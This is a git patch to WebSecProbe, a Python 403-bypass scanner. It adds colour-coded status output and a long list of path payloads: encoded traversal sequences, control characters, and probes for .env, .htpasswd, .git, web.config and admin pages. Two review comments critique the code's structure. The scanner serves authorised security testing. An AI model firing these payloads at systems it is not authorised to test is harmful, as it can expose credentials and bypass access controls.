From ef682fc6d21eee7966affefd4483366b2a420d7e Mon Sep 17 00:00:00 2001
From: Spyboy
Date: Wed, 20 Mar 2024 06:31:24 +0530
Subject: [PATCH] more payloads
---
 WebSecProbe/main.py | 123 +++++++++++++++++++++++++++++++++++++++++---
 setup.py | 4 +-
 2 files changed, 118 insertions(+), 9 deletions(-)
diff --git a/WebSecProbe/main.py b/WebSecProbe/main.py
index 45f669b..c4171ee 100644
--- a/WebSecProbe/main.py
+++ b/WebSecProbe/main.py
@@ -1,5 +1,3 @@
-# websecprobe/websecprobe/cli.py
-
 import argparse
 import requests
 import json
@@ -27,8 +25,20 @@ def send_request(self, payload):
 full_url = f"{self.url}/{payload}"
 response = requests.get(full_url) # Remove verify=False to enable SSL certificate verification
 status_code = response.status_code
+ colored_code = self.color_status_code(status_code) # Added this line to colorize status codes
 content_length = len(response.content)
- self.results.append([full_url, status_code, content_length])
+ self.results.append([full_url, colored_code, content_length])
+
+ def color_status_code(self, code):
+ if code >= 200 and code < 300:
+ return f'\033[32m{code}\033[0m' # Green
+ elif code >= 300 and code < 400:
+ return f'\033[33m{code}\033[0m' # Yellow
+ elif code >= 400 and code < 500:
+ return f'\033[31m{code}\033[0m' # Red
+ else:
+ return f'\033[35m{code}\033[0m' # Magenta
+
 def run(self):
 # Validate the URL
@@ -65,7 +75,7 @@ def run(self):
 f"-H X-Host: {self.path}127.0.0.1",
 f"{self.path}..;/",
 f" {self.path};/",
- f"{self.path}/path", #new payloads from here
+ f"{self.path}/path",
 f"{self.path}%2Fpath",
 f"{self.path}%252Fpath",
 f"{self.path}/path;parameter",
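Review bot: `send_request` now stores the ANSI-wrapped string from `color_status_code` in `self.results` in place of the integer status, so anything that later sorts, filters, compares or serialises that row receives escape sequences (the file imports `json`; whether results are exported is outside this hunk). For a scanner whose output is triaged or redirected to a file, the raw code is the data and the colour is presentation: keep `self.results.append([full_url, status_code, content_length])` and call `self.color_status_code(...)` only where the table is printed, ideally only when stdout is a terminal. Two smaller points in the new method: 1xx codes fall into the `else` branch together with 5xx, and the range tests read better chained, `if 200 <= code < 300:`. The method has no docstring; `"""Return code wrapped in an ANSI colour chosen by status class."""` would cover it. `send_request` begins above this hunk.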
@@ -74,7 +84,106 @@ def run(self):
 f"{self.path}%u002Fpath",
 f"{self.path}%252E",
 f"{self.path}%00{self.path}",
- f"{self.path}/path%2Ehtml"
+ f"{self.path}/path%2Ehtml",
+ # New payloads
+ f"{self.path}/?",
+ f"{self.path}//",
+ f"{self.path}??",
+ f"{self.path}??/",
+ f"{self.path}..;",
+ f"{self.path}%23",
+ f"{self.path}%26",
+ f"{self.path}/~",
+ f"{self.path}/%7E",
+ f"{self.path}/%C0%AF",
+ f"{self.path}/%C0%AE",
+ f"{self.path}/%252E%252E/",
+ f"{self.path}/%252F",
+ f"{self.path}/%255C",
+ f"{self.path}%3f",
+ f"{self.path}%3F",
+ f"{self.path}/%252e/",
+ f"{self.path}/%252e%252e/",
+ f"{self.path}/%252f",
+ f"{self.path}/%2e/",
+ f"{self.path}/%2e%2e/",
+ f"{self.path}/%2f",
+ f"{self.path}/%09",
+ f"{self.path}/%09/",
+ f"{self.path}/%0A",
+ f"{self.path}/%0A/",
+ f"{self.path}/%0D",
+ f"{self.path}/%0D/",
+ f"{self.path}/%0C",
+ f"{self.path}/%0C/",
+ f"{self.path}/.json",
+ f"{self.path}/.json/",
+ f"{self.path}/.xml",
+ f"{self.path}/.xml/",
+ f"{self.path}/.html",
+ f"{self.path}/.html/",
+ f"{self.path}/.php",
+ f"{self.path}/.php/",
+ f"{self.path}/.asp",
+ f"{self.path}/.asp/",
+ f"{self.path}/.aspx",
+ f"{self.path}/.aspx/",
+ f"{self.path}/.cgi",
+ f"{self.path}/.cgi/",
+ f"{self.path}/.jsp",
+ f"{self.path}/.jsp/",
+ f"{self.path}/.exe",
+ f"{self.path}/.exe/",
+ f"{self.path}/.dll",
+ f"{self.path}/.dll/",
+ f"{self.path}/.bat",
+ f"{self.path}/.bat/",
+ f"{self.path}/.bin",
+ f"{self.path}/.bin/",
+ f"{self.path}/.phtml",
+ f"{self.path}/.phtml/",
+ f"{self.path}/.htaccess",
+ f"{self.path}/.htaccess/",
+ f"{self.path}/.htpasswd",
+ f"{self.path}/.htpasswd/",
+ f"{self.path}/web.config",
+ f"{self.path}/web.config/",
+ f"{self.path}/robots.txt",
+ f"{self.path}/robots.txt/",
+ f"{self.path}/admin",
+ f"{self.path}/admin/",
+ f"{self.path}/administrator",
+ f"{self.path}/administrator/",
+ f"{self.path}/login",
+ f"{self.path}/login/",
+ f"{self.path}/wp-admin",
+ f"{self.path}/wp-admin/",
+ f"{self.path}/wp-login",
+ f"{self.path}/wp-login/",
+ f"{self.path}/config",
+ f"{self.path}/config/",
+ f"{self.path}/.git",
+ f"{self.path}/.git/",
+ f"{self.path}/.svn",
+ f"{self.path}/.svn/",
+ f"{self.path}/.hg",
+ f"{self.path}/.hg/",
+ f"{self.path}/.bzr",
+ f"{self.path}/.bzr/",
+ f"{self.path}/test",
+ f"{self.path}/test/",
+ f"{self.path}/demo",
+ f"{self.path}/demo/",
+ f"{self.path}/backup",
+ f"{self.path}/backup/",
+ f"{self.path}/tmp",
+ f"{self.path}/tmp/",
+ f"{self.path}/temp",
+ f"{self.path}/temp/",
+ f"{self.path}/.env",
+ f"{self.path}/.env/",
+ f"{self.path}/.DS_Store",
+ f"{self.path}/.DS_Store/",
 ]
 for payload in payloads:
@@ -121,7 +230,7 @@ def main():
 blog = 'https://spyboy.blog/'
 github = 'https://github.com/spyboy-productions/WebSecProbe'
- VERSION = '0.0.11'
+ VERSION = '0.0.12'
 R = '\033[31m' # red
 G = '\033[32m' # green
@@ -162,4 +271,4 @@ def main():
 probe.run()
 if __name__ == "__main__":
- main()
+ main()
\ No newline at end of file
diff --git a/setup.py b/setup.py
index 381a5e1..9ebe5b1 100644
--- a/setup.py
+++ b/setup.py
@@ -7,8 +7,8 @@ with codecs.open(os.path.join(here, "README.md"), encoding="utf-8") as fh:
 long_description = "\n" + fh.read()
-VERSION = '0.0.11'
-DESCRIPTION = 'Web Security Assessment Tool'
+VERSION = '0.0.12'
+DESCRIPTION = 'Bypass 403'
 # Setting up
 setup(
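Review bot: The hundred lines added to the list in the `-74,7 +84,106` hunk of `WebSecProbe/main.py` carry a single `# New payloads` comment, which does not tell a reader which entries are encoding variants of the path and which are fixed names appended to it, so a result row cannot be classified without reading the whole list. The entries from `f"{self.path}/.json"` onward are hand-written pairs that differ only by a trailing `/`, and several earlier ones differ only in hex case (`%3f`/`%3F`, `/%252F`/`/%252f`, `/%252E%252E/`/`/%252e%252e/`). I would move the list out of `run()` into named module-level tuples with one comment per group, for example `# percent-encoded separators` and `# fixed file and directory names`, and state in a comment whether the case-only pairs are intentional or duplicates. The list and the `for payload in payloads:` loop belong to `run()`, which starts and ends outside this hunk.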